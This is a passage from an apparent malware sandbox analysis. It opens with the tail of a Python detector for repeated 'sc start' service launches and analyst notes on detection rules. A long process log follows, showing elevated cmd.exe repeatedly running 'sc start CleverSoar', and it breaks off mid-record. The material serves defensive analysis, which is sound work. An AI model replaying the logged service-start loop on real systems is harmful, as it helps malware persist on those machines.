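        m = re.search(r"\bsc(?:\.exe)?\s+start\s+(\S+)", cmd, re.I)
        # Count only sc.exe itself so the cmd.exe wrapper is not double-counted.
        if m and image.lower() == "sc.exe":
            start_counts[m.group(1)] += 1
    for name, n in start_counts.items():
        if n >= start_threshold:
            findings.append(("repeated_start", "sc.exe",
                             f"{name} started {n} times; correlate with service-control "
                             "and code-integrity event logs"))
    return findings


if __name__ == "__main__":
    for rule, image, detail in analyze(SAMPLE):
        print(f"{rule:20} {image:16} {detail}")
```

The recovered `-p` values are what an analyst needs to open `res.dat` and `locale3.dat` from the sandbox's dropped files; the `.dll`-as-kernel-driver and volume-wide exclusion checks are the two rules worth porting to EDR process-creation telemetry as they stand.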

                                  Target ID:16
                                  Start time:23:17:38
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:17
                                  Start time:23:17:38
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:18
                                  Start time:23:17:38
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:19
                                  Start time:23:17:38
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:20
                                  Start time:23:17:39
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:21
                                  Start time:23:17:39
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:23
                                  Start time:23:17:39
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:24
                                  Start time:23:17:39
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:25
                                  Start time:23:17:39
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:26
                                  Start time:23:17:39
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:27
                                  Start time:23:17:39
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:28
                                  Start time:23:17:39
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:29
                                  Start time:23:17:39
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:30
                                  Start time:23:17:39
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:31
                                  Start time:23:17:39
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:32
                                  Start time:23:17:39
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:33
                                  Start time:23:17:39
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:34
                                  Start time:23:17:39
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:35
                                  Start time:23:17:39
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:36
                                  Start time:23:17:39
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:37
                                  Start time:23:17:39
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:38
                                  Start time:23:17:39
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:39
                                  Start time:23:17:40
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:40
                                  Start time:23:17:40
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:41
                                  Start time:23:17:40
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:42
                                  Start time:23:17:40
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff70f330000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:43
                                  Start time:23:17:40
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:44
                                  Start time:23:17:40
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:45
                                  Start time:23:17:40
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:46
                                  Start time:23:17:40
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:47
                                  Start time:23:17:40
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:48
                                  Start time:23:17:40
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:49
                                  Start time:23:17:40
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:50
                                  Start time:23:17:40
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:51
                                  Start time:23:17:40
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:52
                                  Start time:23:17:40
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:53
                                  Start time:23:17:40
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:54
                                  Start time:23:17:40
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:55
                                  Start time:23:17:40
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:56
                                  Start time:23:17:41
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:57
                                  Start time:23:17:41
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:58
                                  Start time:23:17:41
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:59
                                  Start time:23:17:41
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:60
                                  Start time:23:17:41
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:61
                                  Start time:23:17:41
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:62
                                  Start time:23:17:41
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:63
                                  Start time:23:17:41
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:64
                                  Start time:23:17:41
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:65
                                  Start time:23:17:41
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:66
                                  Start time:23:17:41
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:67
                                  Start time:23:17:41
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:68
                                  Start time:23:17:41
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:69
                                  Start time:23:17:41
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:70
                                  Start time:23:17:41
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:71
                                  Start time:23:17:41
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:72
                                  Start time:23:17:42
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:73
                                  Start time:23:17:42
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:74
                                  Start time:23:17:42
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:75
                                  Start time:23:17:42
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:76
                                  Start time:23:17:42
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:77
                                  Start time:23:17:42
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:78
                                  Start time:23:17:42
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:79
                                  Start time:23:17:42
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:80
                                  Start time:23:17:42
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:81
                                  Start time:23:17:42
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
